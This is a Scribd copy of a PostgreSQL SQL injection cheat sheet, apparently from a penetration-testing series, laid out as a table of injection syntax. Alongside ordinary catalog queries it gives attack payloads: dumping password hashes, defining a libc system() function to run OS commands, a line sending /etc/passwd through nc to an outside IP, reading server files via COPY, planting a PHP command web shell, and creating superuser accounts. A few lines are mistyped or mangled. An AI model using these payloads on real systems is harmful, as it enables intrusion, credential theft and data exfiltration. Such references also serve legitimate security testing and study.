Scribd
Upload
678 views

Postgres SQL Injection Cheat Sheet

This document provides a cheat sheet of useful SQL injection syntax for exploiting PostgreSQL databases, including commands to view database details like users, passwords, privileges and tables as well as execute operating system commands and access files on the server. Several queries require administrative privileges to run as they can alter the database or file system. The cheat sheet is intended to help highlight PostgreSQL injection techniques and areas that require further research.

Uploaded by

Abhijit Chatterjee
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
678 views

Postgres SQL Injection Cheat Sheet

This document provides a cheat sheet of useful SQL injection syntax for exploiting PostgreSQL databases, including commands to view database details like users, passwords, privileges and tables as well as execute operating system commands and access files on the server. Several queries require administrative privileges to run as they can alter the database or file system. The cheat sheet is intended to help highlight PostgreSQL injection techniques and areas that require further research.

Uploaded by

Abhijit Chatterjee
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 3

Postgres SQL Injection Cheat Sheet

Some useful syntax reminders for SQL Injection into PostgreSQL databases…

This post is part of a series of SQL Injection Cheat Sheets.  In this series, I’ve endevoured to
tabulate the data to make it easier to read and to use the same table for for each database
backend.  This helps to highlight any features which are lacking for each database, and
enumeration techniques that don’t apply and also areas that I haven’t got round to
researching yet.

Some of the queries in the table below can only be run by an admin. These are marked with
“– priv” at the end of the query.

Version SELECT version()


SELECT 1; –comment
Comments
SELECT /*comment*/1;
SELECT user;
SELECT current_user;
Current User SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
List Users SELECT usename FROM pg_user
List Password
SELECT usename, passwd FROM pg_shadow — priv
Hashes
Password Cracker MDCrack can crack PostgreSQL’s MD5-based passwords.
List Privileges SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
List DBA Accounts SELECT usename FROM pg_user WHERE usesuper IS TRUE
Current Database SELECT current_database()
List Databases SELECT datname FROM pg_database
SELECT relname, A.attname FROM pg_class C, pg_namespace N,
pg_attribute A, pg_type T WHERE (C.relkind=’r’) AND
List Columns (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid)
AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE
‘public’)
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN
pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind
List Tables
IN (‘r’,”) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND
pg_catalog.pg_table_is_visible(c.oid)
Find Tables From If you want to list all the table names that contain a column LIKE
Column Name ‘%password%’:SELECT DISTINCT relname FROM pg_class C,
pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r’) AND
(N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid)
AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE
‘public’) AND attname LIKE ‘%password%’;
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0;
Select Nth Row — rows numbered from 0
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
Select Nth Char SELECT substr(‘abcd’, 3, 1); — returns c
SELECT 6 & 2; — returns 2
Bitwise AND
SELECT 6 & 1; –returns 0
ASCII Value ->
SELECT chr(65);
Char
Char -> ASCII
SELECT ascii(‘A’);
Value
SELECT CAST(1 as varchar);
Casting
SELECT CAST(‘1’ as int);
String
SELECT ‘A’ || ‘B’; — returnsAB
Concatenation
IF statements only seem valid inside functions, so aren’t much use for
If Statement
SQL injection.  See CASE statement instead.
Case Statement SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; — returns A
Avoiding Quotes SELECT CHR(65)||CHR(66); — returns AB
SELECT pg_sleep(10); — postgres 8.2+ only
CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS
Time Delay
‘/lib/libc.so.6’, ‘sleep’ language ‘C’ STRICT; SELECT sleep(10); –priv,
create your own sleep function.  Taken from here .
Generally not possible in postgres.  However if contrib/dblinkis installed
(it isn’t by default) it can be used to resolve hostnames (assuming you
have DBA rights):
Make DNS SELECT * FROM dblink('host=put.your.hostname.here user=someuser
Requests dbname=somedb', 'SELECT version()') RETURNS (result TEXT);

Alternatively, if you have DBA rights you could run an OS-level command
(see below) to resolve hostnames, e.g. “ping pentestmonkey.net”.
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS
Command ‘/lib/libc.so.6’, ‘system’ LANGUAGE ‘C’ STRICT; — privSELECT
Execution system(‘cat /etc/passwd | nc 10.0.0.1 8080’); — priv, commands run as
postgres/pgsql OS-level user
Local File Access CREATE TABLE mydata(t text);
COPY mydata FROM ‘/etc/passwd’; — priv, can read files which are
readable by postgres OS-level user
…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; — get data
back one row at a time
…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; — get data
back one row at a time …
DROP TABLE mytest mytest;Write to a file:

CREATE TABLE mytable (mycol text);


INSERT INTO mytable(mycol) VALUES (‘<? pasthru($_GET[cmd]); ?>’);
COPY mytable (mycol) TO ‘/tmp/test.php’; –priv, write files as postgres
OS-level user.  Generally you won’t be able to write to the web root, but
it’s always work a try.
— priv user can also read/write files by mapping libc functions
SELECT inet_server_addr(); — returns db server IP address (or null if
Hostname, IP using local connection)
Address SELECT inet_server_port(); — returns db server IP address (or null if
using local connection)
CREATE USER test1 PASSWORD ‘pass1’; — priv
Create Users CREATE USER test1 PASSWORD ‘pass1’ CREATEUSER; — priv, grant
some privs at the same time
Drop Users DROP USER test1; — priv
Make User DBA ALTER USER test1 CREATEUSER CREATEDB; — priv
 Location of DB SELECT current_setting(‘data_directory’); — priv
files SELECT current_setting(‘hba_file’); — priv
Default/System template0
Databases template1

You might also like